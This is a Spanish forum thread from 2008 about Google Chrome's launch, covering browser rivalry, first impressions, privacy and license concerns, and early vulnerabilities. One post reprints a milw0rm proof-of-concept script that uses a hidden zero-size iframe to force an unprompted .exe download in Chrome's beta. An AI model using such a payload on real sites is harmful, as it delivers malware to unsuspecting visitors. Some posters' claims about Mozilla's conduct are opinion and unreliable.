PDA

Ver la versión completa : Google presenta su nuevo navegador llamado Chrome



LUK
02-09-2008, 12:28
El navegador gratuito estará disponible como descarga desde hoy en más de cien países para las máquinas que corran con Windows. La versión para Mac y Linux aún no está lista.

Era un anuncio esperado desde hace tiempo. Antes o después, era evidente que Google tenía que dar el salto a este segmento, el de los navegadores, para desbancar a Microsoft, su enemigo más acérrimo.

Chrome llega al mercado una semana después del lanzamiento de la beta pública de IE8 de Microsoft. Se trata de un motor construido con un Javascript propio, a pesar de que Webkit ya tiene uno. Combinado con Gears, que permite acceso offline, Chrome es en realidad un sistema operativo para escritorio que compite directamente, no ya con IE, sino con Windows.

A partir de ahora, empezarán a verse millones de dispositivos web que podrán saltarse por completo la capa de Windows y utilizar el navegador como único sistema operativo que necesiten los usuarios.

Mientras tanto, Microsoft está atado de pies y manos con su navegador, al que no se atreve si quiera a unir a su motor de búsqueda por miedo a que le lluevan las denuncias anti-monopolio. Un problema que no tiene Google.

Hasta ahora, Google había intentado atacar a Internet Explorer dando soporte a Firefox. Con Chrome, la competencia será aún más directa.

Descargar Google Chrome: http://www.google.com/chrome/

Enlaces:
AP (http://www.smh.com.au/news/biztech/new-google-browser-to-muscle-in-on-microsoft/2008/09/02/1220121183420.html?page=2)

Nost
02-09-2008, 13:30
Joder, ya no solo va a joder a Opera sino también a Firefox :D

gondar_f
02-09-2008, 15:24
Ya fue a finales del 2006 cuando mozilla presento la versión fianl del firefox 2 y que no cumplia lo que prometia cuando Google se vio forzada a dar este paso. Supuestamente el firefox 2 soportaría una serie de tecnología que no soporto al final (vease CSS 2, soporte SVG mejorado... en resumen que como mínimo pasase el test acid 2)... que habría que pedir explicaciones porque Mozilla distribuyo imagenes de como supuestamente el firefox 2 (aun en versión beta) pasava el test acid2 y resultados de test (velocidad de renderizado y consumo de memoria entre otros) que al final se vio que eran totalmente falsos.

Al mes de salida del firefox 2, responsables de google digeron abiertamente que estaban muy decepcionados con el resultado (Google había puesto mucho dinero en metálico o sueldos de programdores), desde entonces se hablo de que google podría desarrollar su propio navegador, a pesar de que originalmente no tenian esa intencion ya que eso le grangearia muchos enemigos, pero el negocio de google son páginas web que ofrecen servicios y si no hay navegadores compatibles sus servicios no serán visitados.

Para aliviar el malestar de Google, Mozilla se apresuro a anunciar el futuro Firefox 3 para Junio del 2007 ("casualmente" se lanzo justo un año tarde). Navegador que prometia que solucionaria todos los temores de google.

Google no se casa con nadie y después del escandaloso caso de actualizaciones que dejaban sin internet a mucha gente, durante la actualización 2.0.3 del firefox y la consecuente 2.0.4, en marzo del 2007. Pues se dice que google llego a un acuerdo con Apple. Acuerdo desmentido por ambas partes, pero que se confirmo que existia cuando en Junio del 2007 se presento la primera beta del Safari 3 para windows. En esos mismos día se lanzo una nueva beta del firefox 3, pero aunque prometia mucho, se vehía que aun estaba lejos del navegadores como el Safari/konqueror y del Opera en todo menos en número de usuarios.

Personalmente crei que Google se conformaria con una versión de Safari para Windows, con ello ya había 2 navegadores multiplataforma que cumplian sus requisitos para poder ofrecer los servicios de nueva generación que estaba preparando (especialmente el google drive, una nueva versión de gmail con una integración plena de calendar y docs...). Pero, al igual que muchos otros, me equivoque aunque no del todo.

Desde Junio del 2007 se viene hablando con más insistencia del supuesto navegador del google, pero en la navidad del 2007/2008 parecia que con la inminente salida del firefox 3 las desavenencias pasadas entre google y mozilla estaban olvidadas (que se retraso otros 6 meses más y aun así en el momento de presentarse venina con un fallo de seguridad brutal y que los de Mozilla conocían al menos desde noviembre del 2006 cuando sacaron la actualización del firefox 2.0.1 para taparlo, pero no solucionarlo y aun sigue sin solucionarse, solo hay otro parche para dificultar su explotación).

Pero entre Marzo y Abril del 2008 empezaron los de Mozilla a hacer su juego usual, comparaban su versión casi lista del firefox 3 con versiones alfa o beta muy tempranas de la competencia (vese iexplorer 8, opera 9.5 y Safari 3), especialmente en que supuestamente su motor era el más rápido ejecutando código javascript, presumir de funciones nuevas (como las de restaurar sesión) de su navegador que daban como únicas cuando otros navegadores (como el Opera) ya tenian hace 2 años.

Lo más curioso de esos días fue que se presento el test Acid3 (cuando ninguan versión final del firefox aun consiguiera pasar el 2) y los de mozilla superorgullosos mostraban como su firefox beta 5 sacaba más puntos que versiones beta de sus rivales al día siguiente de la presentación del test y siguieron mostrando los mismos resultados incluso los días previos de su presentación final. Curiosamente el firefox 3 jamás pasara el test acid3 y en cambio el opera y safari ya lo pasan. Además Opera saco una versión final y sin problemas serios conocidos semanas antes, el Safari otro tanto del mismo.

Eso si, Mozilla siempre con lo mismo, en los mismos días de la salida de la versión final del firefox 3 ya presentaban una versión muy previa del que será el firefox 4, y ese parece que si soportara todo y más o eso es lo que dicen desde Mozilla.

Y bueno después de todo eso google solo tenia 4 opciones:
-Desarrollar su propio navegador desde cero, pero esta opción solo sería a tomar en cuenta si el futuro navegador fuese propietario.

-Desarrollar su propio navegador a partir de otro ya existente, claro que esto le deja con una sola opción (la que tomo al final) y es basarse en WebKit o directamente en KHTML/KJS... la altarnativa de basarse en gecko no le sirve ya que el resultado será otro firefox o flock, algo que ya existe y no sirve para sus propositos.

-Comprar a Apple, el problema es que Apple tiene un valor muy alto y aunque como beneficio colateral tendría al MacOS X (el mejor SO actual), eso le causaría graves problemas. Además Apple no está en venta.

-Comprar a Opera, sería una buena idea, pero dificil de llevar a cabo por un solo motivo, sus acciones estan repartidas entre unos pocos que no quieren desacerse de ellas a pesar de que la compañia no da beneficios.

Resultado después de que Chrome salga:
-Para iexplorer, pues el futuro iexplorer 8 tendrá más competencia de la prevista, pero a lo sumo perdera algo más de presencia en el mercado, pero como MS tiene servicio muy populares como hotmail, pues a día de hoy no está amenazado.

-Safari/konqueror, pues para este es una buena noticia, aunque puede que pierda algo de presencia en el mercado, lo cierto es que si Chrome triunfa, en fin de cuenta desciende de ellos y para ellos viene bien, ellos serán la referencia y habrá código que reutilizarán...

-Opera, pues Opera tiene sus usuarios y aunque el Chrome coge muchas de sus ideas (algo que no pasaba con Safari que cada uno sigue una linea de diseño distinta aunque paralela) algo que puede que algunos usuarios que se veian atraidos por ellas se pasen a Chrome. Lo cierto es que Chrome no es una amenaza para la presencia de Opera. La amenaza es Google que lleva años voicoteando a Opera. Aun recientemente hizo de las suyas y los sufridos usuarios de Opera se tuvieron que apañar. No cabe duda que Google piensa quedarse con sus usuarios, pero yo no creo que lo tenga fácil. Lo cierto es que Opera a día de hoy es el mejor navegador para Windows y para dispositivos móviles y eso no cambiara.

-Mozilla y su firefox y compañia. Estos si que se verán en graves apuros, a estos si que el movimiento de Google les pone en un aprieto, aunque Google siga financiandolos (algo que parece que seguira haciendo, ya se sabe no es bueno arriesgarlo todo a un solo dado) pues se encontraran que su situación privilegiada se ha terminado y ahora está entre 2 gigantes. Que razón tenian los que hace unas semanas decian que Firefox había tocado techo. Lo más provable es que Chrome cuando salga definitivamente, su primer público objetivo son usuarios de firefox. Y no cabe duda que si Chrome cuaja entre el público, pues será a costa del nicho del Firefox.

Un Saludo

j8k6f4v9j
02-09-2008, 16:56
Al mes de salida del firefox 2, responsables de google digeron abiertamente que estaban muy decepcionados con el resultado (Google había puesto mucho dinero en metálico o sueldos de programdores), desde entonces se hablo de que google podría desarrollar su propio navegador, a pesar de que originalmente no tenian esa intencion ya que eso le grangearia muchos enemigos, pero el negocio de google son páginas web que ofrecen servicios y si no hay navegadores compatibles sus servicios no serán visitados.

ZAS! gondar_f, como siempre, puso el dedo en la llaga :)

Ya sabemos por qué Google boicotea a Opera y alimenta a Firefox. Porque sabe que a Firefox se lo come con patatas y, mientras tanto, Opera podría hacerse tan fuerte que podría resultar muy difícil de derrocar!

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

cañita brava
02-09-2008, 19:24
Yo esperaba alguna novedad ,pero no tiene nada que aportar en nuevo de navegador de google ,aparte de eso la unica ventaja es que es codigo abierto.

Tanpoco me gusta demasiado que tengan un seguimiento de los usuarios,si ya con el buscador google del cual se hace sobre el 60% de las busquedas, con el navegador nos tendran controlados y me gusta bien poco este tipo de seguimientos.

Probaremos mañana creo que es su lanzamiento a ver que resultados da.



Unos saludos

saltamontes
02-09-2008, 22:56
Hola a todos .. me descargue el Chrome, y no se ve nada de fantástico, lo seguiré probando para ver como anda, pero por el momento prefiero a Firefox..xD

Nost
03-09-2008, 01:25
Sí, creo que le van a cambiar el nombre de "Google Chrome" a "Google Mierda".

Ah, y los usuarios de Linux, a esperar...

j8k6f4v9j
03-09-2008, 14:31
El software va a competir con unos productos que llevan mucho tiempo siendo desarrollados. Seamos realistas, necesita su tiempo. sólo han movido ficha.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

LUK
03-09-2008, 18:14
No ha pasado ni 24 horas desde que google anuncio oficialmente su navegador “Google Chrome” (http://www.google.com/chrome) y ya ha sido detectada la primera Vulnerabilidad en este.

Google Chrome es vulnerable a “carpet bombing“, una vulnerabilidad descubierta por el investigador Aviv Raff en el motor web opensource Webkit (Base del navegador Google Chrome y Safari) que permite descargar automáticamente archivos cuando el usuario navega por una página maliciosa.

Raff ha publicado una prueba de concepto (http://raffon.net/research/google/chrome/carpet.html) en la que se muestra como los usuarios de Chrome pueden ser engañados y con solo 2 clicks (obtenidos fácilmente con un poco de ingeniería social) descargaran y ejecutaran archivos .JAR sin ninguna advertencia del navegador.

Con este fallo empieza la historia de la seguridad en el Google Chrome, si quieres saber mas sobre este nuevo navegador de google, te recomiendo leer estos completos reviews realizados por arturogoga (http://www.arturogoga.com/2008/09/02/descargar-google-chrome-caractersticas/), puntogeek (http://www.puntogeek.com/2008/09/02/review-sobre-el-google-chrome-el-nuevo-navegador-de-google/), genbeta (http://www.genbeta.com/2008/09/02-google-chrome-lo-probamos), djar (http://comunidad.dragonjar.org/index.php?topic=535.0), etc… (toda la blogosfera habla de el, descargalo aquí (http://www.google.com/chrome/eula.html)…)

Mas Informacion:
Pagina Oficial de Google Chrome (http://www.google.com/chrome/)
Zdnet (http://blogs.zdnet.com/security/?p=1843)

gondar_f
03-09-2008, 21:35
Realmente eso no es más que ingenieria social, si el usuario tiene que dar 2 clicks...ç

Además esta no es más que una versión beta del navegador, todas las versiones beta por definición tiene fallos.

Para grave la que se descubrio solo una hora después de la salida oficial del firefox 3, pero lo peor era que era una que supuestamente se había solucionado con el parche 2.0.1 de firefox en noviembre del 2006.

Yo hoy he usado durante más de 5 horas seguidas el chrome y la verdad va muy bien, es rapido, sin problems... Aunque claro realmente usa el núcleo del Safari con solo modificaciones en el interprete javascript... Lo curioso y me parece raro que nadie diga nada, es que escepto la función de nueva pestaña (basada en el mismo concepto que Opera) pues es identico a otro navegador que hay para MacOS X y que también se basa en WebKit... ¿casualidad?

Un Saludo

saltamontes
03-09-2008, 23:07
En realidad lo que dice gondar_f es muy cierto, el navegador de google esta en beta, y por lo que tengo entendido las versiones beta son para encontrar errores como el que nombraron, estaría bien darle un poco mas te tiempo, y seguir viendo como se ve este asunto.

Cypress
04-09-2008, 03:52
Yo esperaba alguna novedad ,pero no tiene nada que aportar en nuevo de navegador de google ,aparte de eso la unica ventaja es que es codigo abierto.


Sí tiene algunas novedades, según he estado leyendo en diferntes portales..

Creo que la que más vale destacar, es la independencia de las pestañas, no tengo palabras muy técnicas para comentar esto, pero la idea general es esta, si tenes algun problema en alguna pestaña, con los navegadores actuales se cerraría toda la aplicación.
En Chrome la idea es que las demás pestañas sigan funcionando a pesar de la caida de una.. evitando perder todo.

Chrome ya he reportado dos vulenravilidades como se puede leer en kriptopolis, que son causadas debido a que la versión de webkit que usa no es la última.

Chrome incorpora la navegación incógnito que evita el guardado de historial y demás, - sí para vos, p0rn l0v3r xD -

( Comentario a parte, IE8 beta he estado leyendo que consume el doble de memoria que firefox 3 y más que el propio win XP.. )

Otro motivo por el cual lanzar Chrome, es NoScript, a google no le sirve que bloqueen los JavaScrip perdiendo la posibilidad de que no se lean sus adsense.. entonces necesitan un navegador seguro en la ejecución de js.
Por eso creo V8 el motor de javascript que creo de 0, buscando eficiencia y seguridad.. para que no tengamos que bloquear adesense :P

Aun así, a pesar de estar basado en webkit ( como ephifany que sí lo supero.. ) Chrome, no supera acid3

En fin.. lo estoy bajando a ver que tal..


SAluttes :)

LUK
04-09-2008, 13:53
************************************************** *************************
Author: nerex
E-mail: nerex[at]live[dot]com

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.

This proof-of-concept was created for educational purposes only.
Use the code it at your own risk.
The author will not be responsible for any damages.

Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
************************************************** ************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

# milw0rm.com [2008-09-03]

gondar_f
04-09-2008, 14:39
dejando de lado el iexplorer 8 que aun esta en beta 2 y parece que va muy bien, en cuanto a las cifras de consumo de RAM que circulan por ahí, realmente son similares a las del firefox 3 (algo mayores, pero muy poco y solo con muchas pestañas), aunque claro el firefox 3 come RAM que da gusto (y eso que consume mucha menos que versiones anteriores).

Si, lo cierto es que el Chrome trae algunas novedades, pero pocas, principalmente lo que hizo Google es coger una interfaz al estilo iexplorer 7, con funcionalidades muy apreciadas en Opera por sus usuarios. Y fuera de eso las novedades se cuentan con los dedos, las más importantes las que nombras Cypress.

Lo que si, se espera que en poco tiempo integre más funcionalidades, especialmente de servicios de google, pero también de terceros, al más puro estilo de las opciónes que hay para la barra de google, googledesktop...

También tienes razón, se basa en una versión de WebKit de hace ya bastante tiempo, de ahí que ya aparecieran varios fallos, son fallos de esa versión que ya están corregidos en los navegadores que se basan en la última versión. De ahí también que aun no pase el test acid 3 como si lo hacen la mayoría de los navegadores basados en Webkit. Pero para la versión final puede que usen una versión más nueva de WebKit y ya no tenga esos fallos y pase el test Acid3. Si ya no usan una versión más nueva es por el motor de javascript que han desarrollado, pero provablemente en fechas muy breves sea portado a nueva versión de Webkit y listo.

Un Saludo

PD: dato curioso, WebKit gana por goleada en cuanto a número de navegadores que se basan en el, solo para MacOSX hay unos 5, 2 para linux, 1 para Windows (Chrome), 2 para móbiles, 1 para webtablets (la de nokia), 1 para MorphOS, 1 para AmigaOS, 1 para AROS... y a corto plazo en de SkyOS muy posiblemente se pase a WebKit, lo mismo que para Haiku ... Y no me estraña, el WebKit junto con el Presto de Opera están muy por delante de los demás.

Nost
04-09-2008, 14:58
Probad a poner en la barra de direcciones:
:%

Ah, y probad a poner también...
about:internets

Yoji
04-09-2008, 18:20
Coño, a mi me salido con el segundo intento el protector de pantalla típico de las tuberías verdes xDD y con el primero se me mató Chrome :)

4v7n42
04-09-2008, 18:30
http://img508.imageshack.us/img508/2426/rrxy5.jpg


mierda de google chrome, asi tendria q ser el error
xDD

Nost
04-09-2008, 18:32
Sí, es que es para eso :D

"Desinstalar" :p

4v7n42
04-09-2008, 18:46
esta mejor esta

xD

http://img267.imageshack.us/img267/3053/rr2gk5.jpg

engendrox
05-09-2008, 00:33
jaaaaaaaaaa qe monse

antheus
05-09-2008, 02:24
Estoy de acuerdo con gondar_f, Google Chrome no pasa los tests por su Webkit.Creo que tambien hay que plantearse que detras de Chrome esta, en realidad, el potenciar un buscador que ocupa la primera posicion como es Google (Microsoft tambien esta detras de este mercado de Internet, el de los buscadores), estando otros navegadores como Firefox y Opera en una posicion mucho mas delicada ya que tienen que competir sin ayuda.

P.D:Muy buenos los mensajes del Chrome, pero no olvideis que es una beta, al igual que Internet Exploter 8.:D:D:D

Cypress
05-09-2008, 05:00
me mato :%

Me dio mucha gracia..

Bien, hoy pase casi todo el día con Chrome, para mi win xp 256 de RAM; P4 1.7 Ghtz, pues no anda muy bien.. ( y navegando en paginas de google )

Opera resuelve mejor la memoria, con tres pestañas abiertas.. ya se ponia bastante lento Chrome.
Realmente, lo note bastante lento ( por no decis exesivamente ) a la hora de cargar paginas teniendo ya más de 3 pestañas.

Me gusta, es lindo, simpatico a la vista, pero creo que voy a seguir con Opera..
no me gusta usar la barra de direcciones como buscador, la barra de direcciones no es para eso. Pero bueno, detalles.

Lo que si me parece bastante interesante, el status bar, que aparece cuando es necesario.. y cuando no, no aparece.

Por cierto, en los procesos, aparecen barios Chromes.exe, yo pensaba que eran por cada pestaña, pero no. Al cerrar uno de esoso procesos, se cierra todo el navegador.

:-/

En fin, creo que es buena alternativa, en vez de tener Opera - Firefox, podría pasar a ser Opera - Chrome.

Salutiss :)

Nost
05-09-2008, 15:22
Lectura recomendada:

http://www.microsiervos.com/archivo/internet/chrome-comparado-firefox-explorer.html

Yoji
05-09-2008, 16:17
Interesante artículo, muy bien explicado todo. Pero se sabe para cuando tienen pensado sacar una versión definitiva de chrome? cuando dejará de ser beta. Quitando los fallos que pueda tener o a falta de pulirlo me ha gustado bastante, pero de momento sigo con mi zorro :0=

LastDisaster
05-09-2008, 20:14
Hola a todos, a parte de que el nuevo Chrome no es de lo "mejorcito" que hemos visto, quisiera que todo aquel que lo instale, sepa que:

Al utilizar dicho navegador le esta dando a Google todos los derechos de copyright de los archivos de suba i/o descargue con dicha herramienta para hacer con ellos lo que les plazca.

Esto es un apartado que se muestra en el acuerdo de licencia del cual todos pasamos de largo pero que a veces tiene sus cosillas.

Aqui os lo dejo:

11. Content licence from you
11.1 You retain copyright and any other rights that you already hold in Content that you submit, post or display on or through the Services. By submitting, posting or displaying the content, you give Google a perpetual, irrevocable, worldwide, royalty-free and non-exclusive licence to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content that you submit, post or display on or through the Services. This licence is for the sole purpose of enabling Google to display, distribute and promote the Services and may be revoked for certain Services as defined in the Additional Terms of those Services.
11.2 You agree that this licence includes a right for Google to make such Content available to other companies, organisations or individuals with whom Google has relationships for the provision of syndicated services and to use such Content in connection with the provision of those services.
11.3 You understand that Google, in performing the required technical steps to provide the Services to our users, may (a) transmit or distribute your Content over various public networks and in various media; and (b) make such changes to your Content as are necessary to conform and adapt that Content to the technical requirements of connecting networks, devices, services or media. You agree that this licence shall permit Google to take these actions.
11.4 You confirm and warrant to Google that you have all the rights, power and authority necessary to grant the above licence.

j8k6f4v9j
05-09-2008, 20:24
Muy buena la nota, LastDisaster

Desde luego, es a día de hoy lo esencial a tener en cuenta !!!

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

uid0
06-09-2008, 02:56
yo ademas añadiria (aunque puede que sea un poco conspiranoia por mi parte) que si ya registran todos los movimientos de cada usuario que se hacen a traves de su buscador que no haran con un navegador propio.........

Cypress
06-09-2008, 07:48
esto parece que se ha arreglado:

http://barrapunto.com/articles/08/09/05/0827247.shtml

por lo menos en inglés ^^ :-/

Saludis :)

j8k6f4v9j
06-09-2008, 10:37
mucho mejor :)

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

cañita brava
09-09-2008, 12:13
El gobierno federal de alemania desanconseja usar el nuevo navegador de google Chrome por ofrecer demasiada informacion de sus usuarios,si bien hay que decir que recomienda no usarlo porque todavia esta en Beta


Texto ofrecido por el programa de noticias Tagesschau
original traducido:

La Oficina Federal para la Seguridad en Tecnología de la Información, los usuarios de Internet antes de que el nuevo navegador Chrome advirtió. El programa de la compañía Google no debería aplicarse a navegar por Internet, dijo un portavoz de la Oficina del Berliner Zeitung. Es problemático que Chrome unausgereifte una versión en circulación. También señaló que el de acumular datos del usuario en un proveedor de preocupación. Google tiene con su motor de búsqueda, un programa de correo electrónico y el nuevo navegador de ahora todas las área cubierta por la Internet.


Fuente :http://valleywag.com/5046665/german-government-tells-citizens-not-to-use-google-chrome



Unos saludos¡¡

LUK
12-09-2008, 13:30
Los usuarios de Chrome habréis comprobado una de sus novedades: Omnibox. Se trata de un sistema que sugiere sitios web a medida que tecleas la URL en la barra de direcciones.

Pues bien; acaba de saberse que los caracteres que tecleas son enviados a Google aun sin que pulses la tecla Enter. Según Cnet, la empresa además afirma que guardará un 2 % de ellos junto a la IP correspondiente. Esto significa que el simple hecho de comenzar a teclear una dirección sospechosa dejará su huella "incriminatoria" en los servidores de Google, aunque ni siquiera hayas llegado a cargar esa página. La Electronic Frontier Foundation ya ha manifestado su preocupación al respecto.

Afortunadamente existen varias maneras de cambiar este comportamiento por defecto:
1) cambiar a Google por otro buscador por defecto (poco práctico)
2) desactivar las autosugerencias de Onmnibox en la configuración de Chrome
3) utilizar el modo incógnito
y 4) usar otro navegador ;)

Por su parte, Matt Cutts, de Google, ha publicado una serie de aclaraciones sobre las maneras en que Chrome se comunica (o no) con Google, "a fin de prevenir paranoias"...


Referencias:
Chrome: Google's biggest threat to your privacy (http://blogs.computerworld.com/chrome_googles_biggest_threat_to_your_privacy).
Google's Omnibox could be Pandora's box (http://news.cnet.com/8301-13860_3-10031661-56.html).
Privacy Concerns Over Google Chrome’s "Omnibox". (http://blogoscoped.com/archive/2008-09-04-n10.html)
EFF: We're concerned about Google's Omnibox (http://news.cnet.com/8301-17939_109-10032047-2.html).
Preventing paranoia: when does Google Chrome talk to Google.com?. (http://www.mattcutts.com/blog/google-chrome-communication/)
Fuente: http://www.kriptopolis.org/mejorar-privacidad-chrome